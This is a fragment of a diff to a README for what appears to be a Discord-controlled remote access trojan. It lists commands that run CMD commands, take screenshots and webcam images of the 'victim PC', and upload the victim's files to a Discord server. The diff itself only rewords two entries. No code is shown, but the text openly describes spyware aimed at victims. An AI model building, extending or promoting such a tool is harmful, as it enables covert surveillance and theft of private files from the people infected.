xShamir/Heartbleed/README.md

             "5": Execute a link in web browser.
             "6": Execute hotkey.
             "7": Execute CMD commands.
-            "8": Take screenshot of victim PC and send to discord.
+            "8": Take screenshot of victim PC and send to discord server.
-            "9": Take shot of victim webcam and send to discord.
+            "9": Take shot of victim webcam and send to discord server.
             "10": Upload files of victim and send to discord. (upto 7mb).

 You can always add more commands if you like.